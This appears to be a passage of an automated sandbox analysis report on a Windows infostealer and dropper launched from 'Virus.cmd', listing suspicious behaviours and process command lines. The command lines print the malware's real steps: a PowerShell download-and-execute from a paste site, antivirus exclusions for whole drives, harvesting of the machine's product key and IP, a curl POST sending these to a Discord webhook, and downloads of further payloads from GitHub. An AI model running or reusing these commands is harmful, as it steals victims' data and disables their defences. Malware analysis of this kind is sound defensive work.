N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\ProgramData\x4V5.2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\ApplicationFrameHost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4572 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1940 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1940 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1940 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 2900 wrote to memory of 1576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 3328 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mountvol.exe
PID 3328 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mountvol.exe
PID 3328 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3328 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2900 wrote to memory of 3664 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 3664 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4128 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4128 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4128 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4128 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2900 wrote to memory of 5112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 5112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 5112 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2900 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2112 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 1020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 1020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1020 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1020 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 3000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 3000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
PID 2900 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
PID 2900 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
PID 2900 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 2900 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 2076 wrote to memory of 4752 N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
PID 2076 wrote to memory of 4752 N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
PID 2900 wrote to memory of 4480 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
PID 2900 wrote to memory of 4480 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
PID 2900 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 2900 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 4480 wrote to memory of 4420 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4480 wrote to memory of 4420 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4480 wrote to memory of 1540 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\ProgramData\x4V5.2.exe
PID 4480 wrote to memory of 1540 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\ProgramData\x4V5.2.exe
PID 4480 wrote to memory of 408 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "irm rentry.co/_setup/raw | iex

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\uninstaller.bat"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\winlog32.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -WindowStyle Hidden -Command ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol | find ":\"

C:\Windows\system32\mountvol.exe

mountvol

C:\Windows\system32\find.exe

find ":\"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c add-mppreference -exclusionpath C:\

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c add-mppreference -exclusionpath F:\

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c add-mppreference -exclusionpath D:\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic csproduct get uuid /value | find /i "uuid="

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid /value

C:\Windows\system32\find.exe

find /i "uuid="

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault" | findstr /ri "REG_SZ"

C:\Windows\system32\reg.exe

reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault"

C:\Windows\system32\findstr.exe

findstr /ri "REG_SZ"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent icanhazip.com

C:\Windows\system32\curl.exe

curl --silent icanhazip.com

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -ks "https://rentry.co/cbkt9fio/raw"

C:\Windows\system32\curl.exe

curl -ks "https://rentry.co/cbkt9fio/raw"

C:\Windows\system32\curl.exe

curl -H "Content-Type: application/json" -d "{\"username\": \"TrollSec\", \"embeds\": [{\"title\": \"Enemey Down\", \"color\": 1, \"fields\": [{\"name\": \"Enemey Informations :\", \"value\": \" ```Admin/UJHKQCDS``` **Unique Identifier** `````` **Product Key** ```YC7N8-G7WR6-9WR4H-6Y2W4-KBT6X``` **IP Address** ```191.101.209.39``` \"}],\"thumbnail\":{\"url\": \"\"}, \"footer\":{\"text\": \"17:07:55.18/Fri 06/21/2024\"}}]}" https://discord.com/api/webhooks/1247862642509484092/vR90Kb-l3UPi2-9HRZ2fJ7o7Q0EBnbyiLGfvtKGN75kUdsj5C5BQ0HaTzj15zyWZuFsZ

C:\Windows\system32\curl.exe

Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/uninstaller" --output "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\system32\curl.exe

Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/winhlp32.ex" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\curl.exe

Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/x4joex.exe" --output "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"

C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe

"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe

"C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"

C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe

"C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'

C:\ProgramData\x4V5.2.exe

"C:\ProgramData\x4V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'

C:\ProgramData\x4Shellcode.exe

"C:\ProgramData\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

